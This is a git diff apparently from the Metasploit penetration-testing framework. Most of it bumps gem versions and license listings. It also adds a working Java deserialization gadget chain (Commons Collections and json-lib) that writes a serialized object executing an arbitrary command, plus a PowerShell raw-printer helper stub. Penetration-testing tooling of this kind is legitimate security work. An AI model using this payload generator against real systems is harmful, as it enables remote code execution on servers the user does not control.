hashery (~> 2.0)
ruby-rc4
@@ -271,9 +277,12 @@ GEM
pry-byebug (3.9.0)
byebug (~> 11.0)
pry (~> 0.13.0)
public_suffix (4.0.5)
public_suffix (4.0.6)
puma (5.2.2)
nio4r (~> 2.0)
racc (1.5.2)
rack (2.2.3)
rack-protection (2.0.8.1)
rack-protection (2.1.0)
rack
rack-test (1.1.0)
rack (>= 1.0, < 3)
@@ -282,116 +291,117 @@ GEM
nokogiri (>= 1.6)
rails-html-sanitizer (1.3.0)
loofah (~> 2.3)
railties (5.2.4.3)
actionpack (= 5.2.4.3)
activesupport (= 5.2.4.3)
railties (5.2.5)
actionpack (= 5.2.5)
activesupport (= 5.2.5)
method_source
rake (>= 0.8.7)
thor (>= 0.19.0, < 2.0)
rainbow (3.0.0)
rake (13.0.1)
rake (13.0.3)
rb-readline (0.5.5)
recog (2.3.14)
recog (2.3.19)
nokogiri
redcarpet (3.5.0)
regexp_parser (1.7.1)
reline (0.1.4)
redcarpet (3.5.1)
regexp_parser (2.1.1)
reline (0.2.5)
io-console (~> 0.5)
rex-arch (0.1.13)
rex-arch (0.1.14)
rex-text
rex-bin_tools (0.1.6)
rex-bin_tools (0.1.7)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.13)
rex-encoder (0.1.4)
rex-core (0.1.16)
rex-encoder (0.1.5)
metasm
rex-arch
rex-text
rex-exploitation (0.1.24)
rex-exploitation (0.1.27)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rex-java (0.1.5)
rex-mime (0.1.5)
rexml
rex-java (0.1.6)
rex-mime (0.1.6)
rex-text
rex-nop (0.1.1)
rex-nop (0.1.2)
rex-arch
rex-ole (0.1.6)
rex-ole (0.1.7)
rex-text
rex-powershell (0.1.87)
rex-powershell (0.1.89)
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.4)
rex-random_identifier (0.1.5)
rex-text
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
rex-registry (0.1.4)
rex-rop_builder (0.1.4)
metasm
rex-core
rex-text
rex-socket (0.1.23)
rex-socket (0.1.29)
rex-core
rex-sslscan (0.1.5)
rex-sslscan (0.1.6)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.2)
rex-text (0.2.28)
rex-zip (0.1.3)
rex-struct2 (0.1.3)
rex-text (0.2.34)
rex-zip (0.1.4)
rex-text
rexml (3.2.4)
rexml (3.2.5)
rkelly-remix (0.0.7)
rspec (3.9.0)
rspec-core (~> 3.9.0)
rspec-expectations (~> 3.9.0)
rspec-mocks (~> 3.9.0)
rspec-core (3.9.2)
rspec-support (~> 3.9.3)
rspec-expectations (3.9.2)
rspec (3.10.0)
rspec-core (~> 3.10.0)
rspec-expectations (~> 3.10.0)
rspec-mocks (~> 3.10.0)
rspec-core (3.10.1)
rspec-support (~> 3.10.0)
rspec-expectations (3.10.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.9.0)
rspec-mocks (3.9.1)
rspec-support (~> 3.10.0)
rspec-mocks (3.10.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.9.0)
rspec-rails (4.0.1)
actionpack (>= 4.2)
activesupport (>= 4.2)
railties (>= 4.2)
rspec-core (~> 3.9)
rspec-expectations (~> 3.9)
rspec-mocks (~> 3.9)
rspec-support (~> 3.9)
rspec-support (~> 3.10.0)
rspec-rails (5.0.1)
actionpack (>= 5.2)
activesupport (>= 5.2)
railties (>= 5.2)
rspec-core (~> 3.10)
rspec-expectations (~> 3.10)
rspec-mocks (~> 3.10)
rspec-support (~> 3.10)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.9.3)
rubocop (0.89.1)
rspec-support (3.10.2)
rubocop (1.12.1)
parallel (~> 1.10)
parser (>= 2.7.1.1)
parser (>= 3.0.0.0)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.7)
regexp_parser (>= 1.8, < 3.0)
rexml
rubocop-ast (>= 0.3.0, < 1.0)
rubocop-ast (>= 1.2.0, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 1.4.0, < 2.0)
rubocop-ast (0.3.0)
parser (>= 2.7.1.4)
ruby-macho (2.2.0)
ruby-prof (1.4.1)
ruby-progressbar (1.10.1)
unicode-display_width (>= 1.4.0, < 3.0)
rubocop-ast (1.4.1)
parser (>= 2.7.1.5)
ruby-macho (2.5.0)
ruby-prof (1.4.2)
ruby-progressbar (1.11.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.2)
ruby_smb (2.0.2)
ruby2_keywords (0.0.4)
ruby_smb (2.0.8)
bindata
openssl-ccm
openssl-cmac
rubyntlm
windows_error
rubyntlm (0.6.2)
rubyntlm (0.6.3)
rubyzip (2.3.0)
sawyer (0.8.2)
addressable (>= 2.3.5)
@@ -399,45 +409,48 @@ GEM
simplecov (0.18.2)
docile (~> 1.1)
simplecov-html (~> 0.11)
simplecov-html (0.12.2)
simpleidn (0.1.1)
simplecov-html (0.12.3)
simpleidn (0.2.1)
unf (~> 0.1.4)
sinatra (2.0.8.1)
sinatra (2.1.0)
mustermann (~> 1.0)
rack (~> 2.0)
rack-protection (= 2.0.8.1)
rack (~> 2.2)
rack-protection (= 2.1.0)
tilt (~> 2.0)
sqlite3 (1.3.13)
sqlite3 (1.4.2)
sshkey (2.0.0)
swagger-blocks (3.0.0)
thin (1.7.2)
thin (1.8.0)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.0.1)
thor (1.1.0)
thread_safe (0.3.6)
tilt (2.0.10)
timecop (0.9.1)
ttfunk (1.6.2.1)
tzinfo (1.2.7)
timecop (0.9.4)
ttfunk (1.7.0)
tzinfo (1.2.9)
thread_safe (~> 0.1)
tzinfo-data (1.2020.1)
tzinfo-data (1.2021.1)
tzinfo (>= 1.0.0)
unf (0.1.4)
unf_ext
unf_ext (0.0.7.7)
unicode-display_width (1.7.0)
warden (1.2.8)
rack (>= 2.0.6)
unicode-display_width (2.0.0)
warden (1.2.9)
rack (>= 2.0.9)
webrick (1.7.0)
websocket-driver (0.7.3)
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
windows_error (0.1.2)
xdr (3.0.1)
activemodel (>= 5.2.0)
activesupport (>= 5.2.0)
xmlrpc (0.3.0)
yard (0.9.25)
xdr (3.0.2)
activemodel (>= 4.2, < 7.0)
activesupport (>= 4.2, < 7.0)
xmlrpc (0.3.2)
webrick
yard (0.9.26)
zeitwerk (2.4.2)
PLATFORMS
ruby
@@ -454,12 +467,11 @@ DEPENDENCIES
rspec-rails
rspec-rerun
rubocop
ruby-prof
ruby-prof (= 1.4.2)
simplecov (= 0.18.2)
sqlite3 (~> 1.3.0)
swagger-blocks
timecop
yard
BUNDLED WITH
1.17.3
2.1.4
+10 -2
View File
@@ -1,5 +1,5 @@
Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: http://www.metasploit.com/
Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: https://www.metasploit.com/
Files: *
Copyright: 2006-2020, Rapid7, Inc.
@@ -123,6 +123,14 @@ Files: data/jtr/*
Copyright: Copyright 1996-2013 by Solar Designer
License: GNU GPL 2.0
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
Copyright: 2011 Jon Bringhurst
License: GNU GPL 2.0
Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
Copyright: 2020 Johnny Shaw
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
+111 -106
View File
@@ -1,30 +1,29 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.0.3, MIT
actionpack, 5.2.4.3, MIT
actionview, 5.2.4.3, MIT
activemodel, 5.2.4.3, MIT
activerecord, 5.2.4.3, MIT
activesupport, 5.2.4.3, MIT
Ascii85, 1.1.0, MIT
actionpack, 5.2.5, MIT
actionview, 5.2.5, MIT
activemodel, 5.2.5, MIT
activerecord, 5.2.5, MIT
activesupport, 5.2.5, MIT
addressable, 2.7.0, "Apache 2.0"
afm, 0.2.2, MIT
arel, 9.0.0, MIT
arel-helpers, 2.11.0, MIT
ast, 2.4.1, MIT
aws-eventstream, 1.1.0, "Apache 2.0"
aws-partitions, 1.354.0, "Apache 2.0"
aws-sdk-core, 3.104.3, "Apache 2.0"
aws-sdk-ec2, 1.186.0, "Apache 2.0"
aws-sdk-iam, 1.43.0, "Apache 2.0"
aws-sdk-kms, 1.36.0, "Apache 2.0"
aws-sdk-s3, 1.78.0, "Apache 2.0"
aws-sigv4, 1.2.1, "Apache 2.0"
bcrypt, 3.1.15, MIT
bcrypt_pbkdf, 1.0.1, MIT
arel-helpers, 2.12.0, MIT
ast, 2.4.2, MIT
aws-eventstream, 1.1.1, "Apache 2.0"
aws-partitions, 1.445.0, "Apache 2.0"
aws-sdk-core, 3.114.0, "Apache 2.0"
aws-sdk-ec2, 1.234.0, "Apache 2.0"
aws-sdk-iam, 1.52.0, "Apache 2.0"
aws-sdk-kms, 1.43.0, "Apache 2.0"
aws-sdk-s3, 1.93.1, "Apache 2.0"
aws-sigv4, 1.2.3, "Apache 2.0"
bcrypt, 3.1.16, MIT
bcrypt_pbkdf, 1.1.0, MIT
bindata, 2.4.8, ruby
bit-struct, 0.16, ruby
bson, 4.10.0, "Apache 2.0"
bson, 4.12.0, "Apache 2.0"
builder, 3.2.4, MIT
bundler, 1.17.3, MIT
bundler, 2.1.4, MIT
byebug, 11.1.3, "Simplified BSD"
coderay, 1.1.3, MIT
concurrent-ruby, 1.0.5, MIT
@@ -32,139 +31,145 @@ cookiejar, 0.3.3, unknown
crass, 1.0.6, MIT
daemons, 1.3.1, MIT
diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.61.4, "Apache 2.0"
docile, 1.3.2, MIT
dnsruby, 1.61.5, "Apache 2.0"
docile, 1.3.5, MIT
ed25519, 1.2.4, MIT
em-http-request, 1.1.6, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.2, MIT
erubi, 1.9.0, MIT
erubi, 1.10.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.1.0, MIT
factory_bot_rails, 6.1.0, MIT
faker, 2.13.0, MIT
faraday, 1.0.1, MIT
faker, 2.17.0, MIT
faraday, 1.3.0, MIT
faraday-net_http, 1.0.1, MIT
faye-websocket, 0.11.0, "Apache 2.0"
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
http_parser.rb, 0.6.0, MIT
i18n, 1.8.5, MIT
io-console, 0.5.6, "Simplified BSD"
irb, 1.2.4, "Simplified BSD"
i18n, 1.8.10, MIT
io-console, 0.5.9, "ruby, Simplified BSD"
irb, 1.3.5, "ruby, Simplified BSD"
jmespath, 1.4.0, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.3.1, ruby
loofah, 2.6.0, MIT
memory_profiler, 0.9.14, MIT
json, 2.5.1, ruby
loofah, 2.9.1, MIT
memory_profiler, 1.0.0, MIT
metasm, 1.0.4, LGPL-2.1
metasploit-concern, 3.0.0, "New BSD"
metasploit-credential, 4.0.2, "New BSD"
metasploit-framework, 6.0.2, "New BSD"
metasploit-model, 3.0.0, "New BSD"
metasploit-payloads, 2.0.10, "3-clause (or ""modified"") BSD"
metasploit_data_models, 4.0.2, "New BSD"
metasploit_payloads-mettle, 1.0.2, "3-clause (or ""modified"") BSD"
metasploit-concern, 3.0.1, "New BSD"
metasploit-credential, 4.0.3, "New BSD"
metasploit-framework, 6.0.41, "New BSD"
metasploit-model, 3.1.3, "New BSD"
metasploit-payloads, 2.0.43, "3-clause (or ""modified"") BSD"
metasploit_data_models, 4.1.3, "New BSD"
metasploit_payloads-mettle, 1.0.9, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mini_portile2, 2.4.0, MIT
minitest, 5.14.1, MIT
mini_portile2, 2.5.0, MIT
minitest, 5.14.4, MIT
mqtt, 0.5.0, MIT
msgpack, 1.3.3, "Apache 2.0"
msgpack, 1.4.2, "Apache 2.0"
multipart-post, 2.1.1, MIT
mustermann, 1.1.1, MIT
nessus_rest, 0.1.6, MIT
net-ldap, 0.16.2, MIT
net-ldap, 0.17.0, MIT
net-ssh, 6.1.0, MIT
network_interface, 0.0.2, MIT
nexpose, 7.2.1, "New BSD"
nokogiri, 1.10.10, MIT
octokit, 4.18.0, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.5.7, MIT
nokogiri, 1.11.3, MIT
octokit, 4.20.0, MIT
openssl-ccm, 1.2.2, MIT
openssl-cmac, 2.0.1, MIT
openvas-omp, 0.0.4, MIT
packetfu, 1.1.13, BSD
parallel, 1.19.2, MIT
parser, 2.7.1.4, MIT
parallel, 1.20.1, MIT
parser, 3.0.1.0, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.0, LGPL-2.1
pdf-reader, 2.4.0, MIT
pdf-reader, 2.4.2, MIT
pg, 1.2.3, "Simplified BSD"
pry, 0.13.1, MIT
pry-byebug, 3.9.0, MIT
public_suffix, 4.0.5, MIT
public_suffix, 4.0.6, MIT
puma, 5.2.2, "New BSD"
racc, 1.5.2, "ruby, Simplified BSD"
rack, 2.2.3, MIT
rack-protection, 2.0.8.1, MIT
rack-protection, 2.1.0, MIT
rack-test, 1.1.0, MIT
rails-dom-testing, 2.0.3, MIT
rails-html-sanitizer, 1.3.0, MIT
railties, 5.2.4.3, MIT
railties, 5.2.5, MIT
rainbow, 3.0.0, MIT
rake, 13.0.1, MIT
rake, 13.0.3, MIT
rb-readline, 0.5.5, BSD
recog, 2.3.14, unknown
redcarpet, 3.5.0, MIT
regexp_parser, 1.7.1, MIT
reline, 0.1.4, "Ruby License"
rex-arch, 0.1.13, "New BSD"
rex-bin_tools, 0.1.6, "New BSD"
rex-core, 0.1.13, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.24, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
rex-ole, 0.1.6, "New BSD"
rex-powershell, 0.1.87, "New BSD"
rex-random_identifier, 0.1.4, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.23, "New BSD"
rex-sslscan, 0.1.5, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.28, "New BSD"
rex-zip, 0.1.3, "New BSD"
rexml, 3.2.4, "Simplified BSD"
recog, 2.3.19, unknown
redcarpet, 3.5.1, MIT
regexp_parser, 2.1.1, MIT
reline, 0.2.5, ruby
rex-arch, 0.1.14, "New BSD"
rex-bin_tools, 0.1.7, "New BSD"
rex-core, 0.1.16, "New BSD"
rex-encoder, 0.1.5, "New BSD"
rex-exploitation, 0.1.27, "New BSD"
rex-java, 0.1.6, "New BSD"
rex-mime, 0.1.6, "New BSD"
rex-nop, 0.1.2, "New BSD"
rex-ole, 0.1.7, "New BSD"
rex-powershell, 0.1.89, "New BSD"
rex-random_identifier, 0.1.5, "New BSD"
rex-registry, 0.1.4, "New BSD"
rex-rop_builder, 0.1.4, "New BSD"
rex-socket, 0.1.29, "New BSD"
rex-sslscan, 0.1.6, "New BSD"
rex-struct2, 0.1.3, "New BSD"
rex-text, 0.2.34, "New BSD"
rex-zip, 0.1.4, "New BSD"
rexml, 3.2.5, "Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.9.0, MIT
rspec-core, 3.9.2, MIT
rspec-expectations, 3.9.2, MIT
rspec-mocks, 3.9.1, MIT
rspec-rails, 4.0.1, MIT
rspec, 3.10.0, MIT
rspec-core, 3.10.1, MIT
rspec-expectations, 3.10.1, MIT
rspec-mocks, 3.10.2, MIT
rspec-rails, 5.0.1, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.9.3, MIT
rubocop, 0.89.1, MIT
rubocop-ast, 0.3.0, MIT
ruby-macho, 2.2.0, MIT
ruby-prof, 1.4.1, "Simplified BSD"
ruby-progressbar, 1.10.1, MIT
rspec-support, 3.10.2, MIT
rubocop, 1.12.1, MIT
rubocop-ast, 1.4.1, MIT
ruby-macho, 2.5.0, MIT
ruby-prof, 1.4.2, "Simplified BSD"
ruby-progressbar, 1.11.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.2, ruby
ruby_smb, 2.0.2, "New BSD"
rubyntlm, 0.6.2, MIT
ruby2_keywords, 0.0.4, "ruby, Simplified BSD"
ruby_smb, 2.0.8, "New BSD"
rubyntlm, 0.6.3, MIT
rubyzip, 2.3.0, "Simplified BSD"
sawyer, 0.8.2, MIT
simplecov, 0.18.2, MIT
simplecov-html, 0.12.2, MIT
simpleidn, 0.1.1, MIT
sinatra, 2.0.8.1, MIT
sqlite3, 1.3.13, "New BSD"
simplecov-html, 0.12.3, MIT
simpleidn, 0.2.1, MIT
sinatra, 2.1.0, MIT
sqlite3, 1.4.2, "New BSD"
sshkey, 2.0.0, MIT
swagger-blocks, 3.0.0, MIT
thin, 1.7.2, "GPLv2+, Ruby 1.8"
thor, 1.0.1, MIT
thin, 1.8.0, "GPL-2.0+, ruby"
thor, 1.1.0, MIT
thread_safe, 0.3.6, "Apache 2.0"
tilt, 2.0.10, MIT
timecop, 0.9.1, MIT
ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.7, MIT
tzinfo-data, 1.2020.1, MIT
timecop, 0.9.4, MIT
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.9, MIT
tzinfo-data, 1.2021.1, MIT
unf, 0.1.4, "2-clause BSDL"
unf_ext, 0.0.7.7, MIT
unicode-display_width, 1.7.0, MIT
warden, 1.2.8, MIT
unicode-display_width, 2.0.0, MIT
warden, 1.2.9, MIT
webrick, 1.7.0, "ruby, Simplified BSD"
websocket-driver, 0.7.3, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
windows_error, 0.1.2, BSD
xdr, 3.0.1, "Apache 2.0"
xmlrpc, 0.3.0, ruby
yard, 0.9.25, MIT
xdr, 3.0.2, "Apache 2.0"
xmlrpc, 0.3.2, "ruby, Simplified BSD"
yard, 0.9.26, MIT
zeitwerk, 2.4.2, MIT
+1
View File
@@ -1,5 +1,6 @@
#!/usr/bin/env rake
require File.expand_path('../config/application', __FILE__)
require 'msfenv'
require 'metasploit/framework/require'
require 'metasploit/framework/spec/untested_payloads'
Vendored
+18 -7
View File
@@ -1,17 +1,23 @@
# -*- mode: ruby -*-
# vi: set ft=ruby :
display_name = "metasploit-framework"
Vagrant.configure(2) do |config|
config.ssh.forward_x11 = true
config.vm.box = "ubuntu/bionic64"
config.vm.box = "hashicorp/bionic64" # https://app.vagrantup.com/hashicorp/boxes/bionic64
config.vm.network :forwarded_port, guest: 4444, host: 4444
config.vm.provider "vmware" do |v|
config.vm.provider "vmware_desktop" do |v|
v.memory = 2048
v.cpus = 2
v.vmx['displayname'] = display_name
#v.gui = true # uncomment to show VM in your hypervisor's GUI
end
config.vm.provider "virtualbox" do |v|
v.name = display_name
v.memory = 2048
v.cpus = 2
#v.gui = true # uncomment to show VM in your hypervisor's GUI
end
%w(.vimrc .gitconfig).each do |f|
local = File.expand_path "~/#{f}"
@@ -28,11 +34,16 @@ Vagrant.configure(2) do |config|
config.vm.provision "shell", inline: step
end
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
"curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4",
[ # use the rvm install method used in omnibus install
# only show stderr when gpg really fails. avoids superfluous stderr from gpg
'out=`curl -sSL https://rvm.io/mpapis.asc | gpg --import - 2>&1` && echo "imported mpapis.asc" || echo $out 1>&2',
'out=`curl -sSL https://rvm.io/pkuczynski.asc | gpg --import - 2>&1` && echo "imported pkuczynski.asc" || echo $out 1>&2',
'out=`curl -L -sSL https://get.rvm.io | bash -s stable 2>&1` && echo "rvm installed" || echo $out 1>&2',
# only install Ruby if the right version isn't already present
"echo 'Installing Ruby if necessary'",
'cd /vagrant && rv=`cat .ruby-version` && source ~/.rvm/scripts/rvm && rvm list strings | grep -q $rv || rvm install $rv',
'source ~/.rvm/scripts/rvm && cd /vagrant && gem install --quiet bundler && bundle',
'mkdir -p ~/.msf4',
].each do |step|
config.vm.provision "shell", privileged: false, inline: step
end
+1 -1
View File
@@ -29,7 +29,6 @@ require 'action_view/railtie'
require 'metasploit/framework/common_engine'
require 'metasploit/framework/database'
module Metasploit
module Framework
class Application < Rails::Application
@@ -52,3 +51,4 @@ end
# Silence warnings about this defaulting to true
I18n.enforce_available_locales = true
require 'msfenv'
@@ -1,4 +1,4 @@
# @note This file is only for use in travis-ci. If you need to make a
# @note This file is only for use in GitHub Actions. If you need to make a
# config/database.yml for running rake, rake spec, or rspec locally, please
# customize `conifg/database.yml.example`
#
@@ -6,14 +6,12 @@
# cp config/database.yml.example config/database.yml
# # update password fields for each environment's user
# Using the postgres user locally without a host and port is the supported
# configuration from Travis-CI
#
# @see http://about.travis-ci.org/docs/user/database-setup/#PostgreSQL
development: &pgsql
adapter: postgresql
database: metasploit_framework_development
host: localhost
username: postgres
password: postgres
pool: 25
timeout: 5
-1
View File
@@ -1,5 +1,4 @@
# Load the rails application
require File.expand_path('../application', __FILE__)
# Initialize the rails application
Metasploit::Framework::Application.initialize!
+191
View File
@@ -0,0 +1,191 @@
package org.vulhub;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamException;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignedObject;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.concurrent.ConcurrentSkipListSet;
import java.util.concurrent.CopyOnWriteArraySet;
import net.sf.json.JSONArray;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.collection.AbstractCollectionDecorator;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.ReferenceMap;
import org.apache.commons.collections.set.ListOrderedSet;
public class Payload implements Serializable {
private Serializable payload;
private Payload(String cmd) throws Exception {
this.payload = this.setup(cmd);
}
private Serializable setup(String cmd) throws Exception {
final String[] execArgs = new String[] { cmd };
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] { String.class,
Class[].class }, new Object[] { "getRuntime",
new Class[0] }),
new InvokerTransformer("invoke", new Class[] { Object.class,
Object[].class }, new Object[] { null, new Object[0] }),
new InvokerTransformer("exec", new Class[] { String.class },
execArgs), new ConstantTransformer(1) };
Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
HashSet map = new HashSet(1);
map.add("foo");
Field f = null;
try {
f = HashSet.class.getDeclaredField("map");
} catch (NoSuchFieldException e) {
f = HashSet.class.getDeclaredField("backingMap");
}
f.setAccessible(true);
HashMap innimpl = (HashMap) f.get(map);
Field f2 = null;
try {
f2 = HashMap.class.getDeclaredField("table");
} catch (NoSuchFieldException e) {
f2 = HashMap.class.getDeclaredField("elementData");
}
f2.setAccessible(true);
Object[] array2 = (Object[]) f2.get(innimpl);
Object node = array2[0];
if (node == null) {
node = array2[1];
}
Field keyField = null;
try {
keyField = node.getClass().getDeclaredField("key");
} catch (Exception e) {
keyField = Class.forName("java.util.MapEntry").getDeclaredField(
"key");
}
keyField.setAccessible(true);
keyField.set(node, entry);
KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
keyPairGenerator.initialize(1024);
KeyPair keyPair = keyPairGenerator.genKeyPair();
PrivateKey privateKey = keyPair.getPrivate();
PublicKey publicKey = keyPair.getPublic();
Signature signature = Signature.getInstance(privateKey.getAlgorithm());
SignedObject payload = new SignedObject(map, privateKey, signature);
JSONArray array = new JSONArray();
array.add("asdf");
ListOrderedSet set = new ListOrderedSet();
Field f1 = AbstractCollectionDecorator.class
.getDeclaredField("collection");
f1.setAccessible(true);
f1.set(set, array);
DummyComperator comp = new DummyComperator();
ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
csls.add(payload);
CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
a1.add(set);
Container c = new Container(csls);
a1.add(c);
a2.add(csls);
a2.add(set);
ReferenceMap flat3map = new ReferenceMap();
flat3map.put(new Container(a1), "asdf");
flat3map.put(new Container(a2), "asdf");
return flat3map;
}
private Object writeReplace() throws ObjectStreamException {
return this.payload;
}
private static class Container implements Serializable {
private Object o;
private Container(Object o) {
this.o = o;
}
private Object writeReplace() throws ObjectStreamException {
return o;
}
}
static class DummyComperator implements Comparator, Serializable {
public int compare(Object arg0, Object arg1) {
// TODO Auto-generated method stub
return 0;
}
private Object writeReplace() throws ObjectStreamException {
return null;
}
}
public static void main(String args[]) throws Exception{
if(args.length != 2){
System.out.println("java -jar payload.jar outfile cmd");
System.exit(0);
}
String cmd = args[1];
FileOutputStream out = new FileOutputStream(args[0]);
Payload pwn = new Payload(cmd);
ObjectOutputStream oos = new ObjectOutputStream(out);
oos.writeObject(pwn);
oos.flush();
out.flush();
}
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,107 @@
# Import-Module NtObjectManager -ErrorAction Ignore
$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
$MethodDefinition = @"
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace Printer {
public class RawPrinterHelper
{
// Structure and API declarions:
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public class DOCINFOA
{
[MarshalAs(UnmanagedType.LPStr)]
public string pDocName;
[MarshalAs(UnmanagedType.LPStr)]
public string pOutputFile;
[MarshalAs(UnmanagedType.LPStr)]
public string pDataType;
}
[DllImport("winspool.Drv", EntryPoint = "OpenPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool OpenPrinter([MarshalAs(UnmanagedType.LPStr)] string szPrinter, out IntPtr hPrinter, IntPtr pd);
[DllImport("winspool.Drv", EntryPoint = "ClosePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool ClosePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartDocPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartDocPrinter(IntPtr hPrinter, Int32 level, [In, MarshalAs(UnmanagedType.LPStruct)] DOCINFOA di);
[DllImport("winspool.Drv", EntryPoint = "EndDocPrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndDocPrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "EndPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "WritePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool WritePrinter(IntPtr hPrinter, IntPtr pBytes, Int32 dwCount, out Int32 dwWritten);
// SendBytesToPrinter()
// When the function is given a printer name and an unmanaged array
// of bytes, the function sends those bytes to the print queue.
// Returns true on success, false on failure.
public static bool SendBytesToPrinter(string szPrinterName, IntPtr pBytes, Int32 dwCount)
{
Int32 dwError = 0, dwWritten = 0;
IntPtr hPrinter = new IntPtr(0);
DOCINFOA di = new DOCINFOA();
bool bSuccess = false; // Assume failure unless you specifically succeed.
di.pDocName = "My C#.NET RAW Document";
di.pDataType = "RAW";
// Open the printer.
if (OpenPrinter(szPrinterName.Normalize(), out hPrinter, IntPtr.Zero))
{
// Start a document.
if (StartDocPrinter(hPrinter, 1, di))
{
// Start a page.
if (StartPagePrinter(hPrinter))
{
// Write your bytes.
bSuccess = WritePrinter(hPrinter, pBytes, dwCount, out dwWritten);
EndPagePrinter(hPrinter);
}
EndDocPrinter(hPrinter);
}
ClosePrinter(hPrinter);
}
// If you did not succeed, GetLastError may give more information
// about why not.
if (bSuccess == false)
{
dwError = Marshal.GetLastWin32Error();
}
return bSuccess;
}
}
}
"@;
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $MethodDefinition -Language CSharp;
Remove-Printer -Name PRINTER_NAME -ErrorAction SilentlyContinue | Out-Null
